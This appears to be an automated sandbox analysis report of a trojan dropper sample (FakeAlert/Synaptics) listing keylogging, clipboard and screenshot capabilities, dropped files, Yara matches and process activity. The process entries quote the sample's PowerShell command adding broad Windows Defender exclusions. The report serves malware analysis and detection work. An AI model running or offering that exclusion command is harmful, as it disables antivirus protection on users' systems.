Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:24 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Content-Security-Policy: script-src 'report-sample' 'nonce-F69_pKNlsi_vh4bFmrC-yQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:24 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-00CzyXufRNr6eJhID_c9KA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:24 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-EOvmVxVbQaFC3tSzPkmSHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked

Source: Synaptics.exe, 00000009.00000003.342497057.00000000054F0000.00000004.00000800.00020000.00000000.sdmp

Source: unknown	HTTPS traffic detected: 172.217.168.14:443 -> 192.168.2.3:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.14:443 -> 192.168.2.3:49737 version: TLS 1.2

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Code function: 6_2_0043C1FC GetKeyboardState,

6_2_0043C1FC

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\._cache_uniformerede.exe

7_2_00405809

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Code function: 6_2_004289FC GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,

6_2_004289FC

Contains functionality to record screenshots

Source: C:\ProgramData\Synaptics\Synaptics.exe

12_2_00429040

One or more processes crash

Source: C:\ProgramData\Synaptics\Synaptics.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 2904

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_004601F0	6_2_004601F0
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0046C7CC	6_2_0046C7CC
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0048C7F4	6_2_0048C7F4
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0044EA40	6_2_0044EA40
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00496E18	6_2_00496E18
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0046B1E4	6_2_0046B1E4
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0045FCC8	6_2_0045FCC8
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00453DA4	6_2_00453DA4
Source: C:\Users\user\Desktop\._cache_uniformerede.exe	Code function: 7_2_00406D5F	7_2_00406D5F
Source: C:\Users\user\Desktop\._cache_uniformerede.exe	Code function: 7_2_687E1BFF	7_2_687E1BFF
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_004601F0	9_2_004601F0
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_0046C7CC	9_2_0046C7CC
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_0048C7F4	9_2_0048C7F4
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_0044EA40	9_2_0044EA40
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_00496E18	9_2_00496E18
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_0046B1E4	9_2_0046B1E4
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_0045FCC8	9_2_0045FCC8
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_00453DA4	9_2_00453DA4
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_004601F0	12_2_004601F0
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_0046C7CC	12_2_0046C7CC
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_0048C7F4	12_2_0048C7F4
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_0044EA40	12_2_0044EA40
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_00496E18	12_2_00496E18
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_0046B1E4	12_2_0046B1E4
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_0045FCC8	12_2_0045FCC8
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_00453DA4	12_2_00453DA4

Abnormal high CPU Usage

Source: C:\Users\user\Desktop\._cache_uniformerede.exe

Process Stats: CPU usage > 98%

PE file contains strange resources

Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: uniformerede.exe.0.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: ._cache_uniformerede.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Synaptics.exe.6.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: RCXCD96.tmp.6.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: YC9w8Aif.exe.9.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: RCXDA77.tmp.9.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: RCXF979.tmp.9.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: ~$cache1.9.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST

Tries to load missing DLLs

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Section loaded: starttiledata.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Section loaded: starttiledata.dll			Jump to behavior

Uses 32bit PE files

Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\._cache_uniformerede.exe

7_2_00403640

Found potential string decryption / allocating functions

Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: String function: 00406CDC appears 32 times
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: String function: 004049E4 appears 40 times
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: String function: 0049058C appears 112 times
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: String function: 00404A58 appears 34 times
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: String function: 004109E8 appears 68 times
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: String function: 004049C0 appears 117 times
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: String function: 004865B4 appears 38 times
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: String function: 00486788 appears 32 times
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: String function: 004070F0 appears 168 times
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: String function: 00404CCC appears 108 times
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: String function: 004967D4 appears 36 times
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: String function: 00403F78 appears 32 times
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: String function: 0040F7A4 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: String function: 0049058C appears 56 times
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: String function: 004109E8 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: String function: 004049C0 appears 73 times
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: String function: 004070F0 appears 81 times
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: String function: 00404CCC appears 54 times

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0043F118 NtdllDefWindowProc_A,GetCapture,	6_2_0043F118
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_004598AC NtdllDefWindowProc_A,	6_2_004598AC
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	6_2_0045A054
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	6_2_0045A104
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0045E9EC SHGetPathFromIDList,SHGetPathFromIDList,NtdllDefWindowProc_A,	6_2_0045E9EC
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0044EA40 GetSubMenu,SaveDC,RestoreDC,73C9B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,	6_2_0044EA40
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0042F60C NtdllDefWindowProc_A,	6_2_0042F60C
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_0043F118 NtdllDefWindowProc_A,GetCapture,	9_2_0043F118
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_004598AC NtdllDefWindowProc_A,	9_2_004598AC
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	9_2_0045A054
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	9_2_0045A104
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_0045E9EC SHGetPathFromIDList,SHGetPathFromIDList,NtdllDefWindowProc_A,	9_2_0045E9EC
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_0044EA40 GetSubMenu,SaveDC,RestoreDC,73C9B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,	9_2_0044EA40
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_0042F60C NtdllDefWindowProc_A,	9_2_0042F60C
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_0043F118 NtdllDefWindowProc_A,GetCapture,	12_2_0043F118
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_004598AC NtdllDefWindowProc_A,	12_2_004598AC
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	12_2_0045A054
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	12_2_0045A104
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_0045E9EC SHGetPathFromIDList,SHGetPathFromIDList,NtdllDefWindowProc_A,	12_2_0045E9EC
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_0044EA40 GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,	12_2_0044EA40
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_0042F60C NtdllDefWindowProc_A,	12_2_0042F60C

PE file contains executable resources (Code or Archives)

Source: uniformerede.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Source: uniformerede.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Source: uniformerede.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: Synaptics.exe.6.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Source: Synaptics.exe.6.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Source: Synaptics.exe.6.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: RCXCD96.tmp.6.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: YC9w8Aif.exe.9.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: RCXDA77.tmp.9.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: RCXDA77.tmp.9.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: RCXF979.tmp.9.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: RCXF979.tmp.9.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: ~$cache1.9.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

Sample file is different than original file name gathered from version info

Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameb! vs SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.dr	Binary or memory string: OriginalFileName vs SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.dr	Binary or memory string: OriginalFilenameb! vs SecuriteInfo.com.Variant.FakeAlert.2.24488.exe

Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20220527

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@21/60@6/2

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Code function: 6_2_00425FB8 GetLastError,FormatMessageA,

6_2_00425FB8

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Code function: 6_2_004747D8 FindResourceA,

6_2_004747D8

Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Virustotal: Detection: 62%
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	ReversingLabs: Detection: 58%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe "C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c start "" "C:\Users\user\AppData\Local\Temp\uniformerede.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\uniformerede.exe "C:\Users\user\AppData\Local\Temp\uniformerede.exe"
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Process created: C:\Users\user\Desktop\._cache_uniformerede.exe "C:\Users\user\Desktop\._cache_uniformerede.exe"
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
Source: unknown	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\ProgramData\Synaptics\Synaptics.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 2904
Source: C:\ProgramData\Synaptics\Synaptics.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 4052
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c start "" "C:\Users\user\AppData\Local\Temp\uniformerede.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\uniformerede.exe "C:\Users\user\AppData\Local\Temp\uniformerede.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Process created: C:\Users\user\Desktop\._cache_uniformerede.exe "C:\Users\user\Desktop\._cache_uniformerede.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00475958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,GetLastError,	6_2_00475958
Source: C:\Users\user\Desktop\._cache_uniformerede.exe	Code function: 7_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	7_2_00403640
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_00475958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,GetLastError,	9_2_00475958
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_00475958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,GetLastError,	12_2_00475958

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe

File created: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Jump to behavior

Source: C:\Users\user\Desktop\._cache_uniformerede.exe

Code function: 7_2_004021AA CoCreateInstance,

7_2_004021AA

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Code function: 6_2_00409ED2 GetDiskFreeSpaceA,

6_2_00409ED2

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6356:120:WilError_01
Source: C:\ProgramData\Synaptics\Synaptics.exe	Mutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6620

Source: C:\Users\user\Desktop\._cache_uniformerede.exe

File written: C:\Users\user\AppData\Local\Temp\udfrielser.ini

Jump to behavior

Source: Yara match	File source: 12.0.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.Synaptics.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.Synaptics.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.Synaptics.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.uniformerede.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.uniformerede.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000000.270423175.0000000000401000.00000020.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.316350277.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
